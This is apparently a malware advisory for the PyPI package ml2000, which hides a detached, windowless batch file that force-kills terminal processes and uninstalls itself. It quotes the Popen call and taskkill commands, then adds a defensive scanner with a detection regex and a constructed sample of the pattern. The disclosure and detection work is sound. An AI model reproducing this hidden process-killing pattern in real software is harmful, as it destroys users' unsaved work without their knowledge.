MAL-2026-4756

Malicious code in ml2000 (PyPI)

Details

## Source: amazon-inspector (871b57a598bf1230a64fa6ee85d442eb30f21915176835801871dc46c59cedf6)

On invoking the `ml2000` CLI with no arguments, `interactive_menu()` in `src/ml_labs/generator.py` writes a batch file and launches it via `subprocess.Popen(["cmd.exe", "/c", bat_path], creationflags=DETACHED_PROCESS | CREATE_NO_WINDOW)`. The batch script runs `taskkill /IM WindowsTerminal.exe /F`, `taskkill /IM cmd.exe /F`, `taskkill /IM powershell.exe /F`, then `pipx uninstall ml2000`, then deletes itself. The use of detached/no-window flags hides this from the user, and the README advertises only ML notebook code generation — the destructive behavior is undisclosed. This is install/use-time destruction of installer-side resources: open terminal sessions are force-killed (causing loss of unsaved work in any other shell the user has open) and the package removes itself behind the user's back. Project metadata is also placeholder (`Your Name <your.email@example.com>`), corroborating that this is not a legitimate maintained release.
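A static triage check for the pattern this source describes, as an added example that is not part of the advisory or of the ml2000 package (the flag set, the `taskkill`/`pipx uninstall` regex and the sample source are constructed here): it parses Python files and flags `Popen` calls that pass hidden-window creation flags, alongside string literals carrying the batch commands named above.

```python
import ast
import re
from pathlib import Path

# Hidden-window flags and batch commands named in the advisory (patterns constructed here).
HIDE_FLAGS = {"DETACHED_PROCESS", "CREATE_NO_WINDOW"}
SUSPICIOUS_STRINGS = re.compile(r"taskkill\s+/IM|pipx\s+uninstall", re.I)

def _flag_names(node):
    """Collect identifiers from a flags expression such as A | B or mod.A | mod.B."""
    return {getattr(n, "id", None) or getattr(n, "attr", None) for n in ast.walk(node)} - {None}

def scan_source(source, filename="<string>"):
    """Return (line, reason) findings for one Python source text."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            # Works for both `subprocess.Popen(...)` and a bare imported `Popen(...)`.
            name = getattr(node.func, "attr", None) or getattr(node.func, "id", None)
            if name == "Popen":
                for kw in node.keywords:
                    if kw.arg == "creationflags":
                        hits = _flag_names(kw.value) & HIDE_FLAGS
                        if hits:
                            findings.append((node.lineno, f"Popen with hidden-window flags {sorted(hits)}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            match = SUSPICIOUS_STRINGS.search(node.value)
            if match:
                findings.append((node.lineno, f"suspicious command string {match.group(0)!r}"))
    return findings

def scan_tree(root):
    """Scan every .py file under root (e.g. an unpacked sdist); returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*.py"):
        try:
            findings = scan_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue  # not parseable as Python 3; skip rather than abort the whole scan
        if findings:
            results[str(path)] = findings
    return results

# Constructed sample imitating the pattern the advisory describes (not the real ml2000 code).
SAMPLE = '''from subprocess import Popen, DETACHED_PROCESS, CREATE_NO_WINDOW
SCRIPT = "taskkill /IM cmd.exe /F && pipx uninstall ml2000"
def interactive_menu(bat_path):
    Popen(["cmd.exe", "/c", bat_path], creationflags=DETACHED_PROCESS | CREATE_NO_WINDOW)
'''
```

Run `scan_tree(path)` over an unpacked wheel or sdist before installing it; findings are leads for manual review of the flagged lines, not proof of malice on their own.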

Affected packages

PyPI / ml2000

No fixed version published yet for ml2000 (pip). Pin to a known-safe version or switch to an alternative.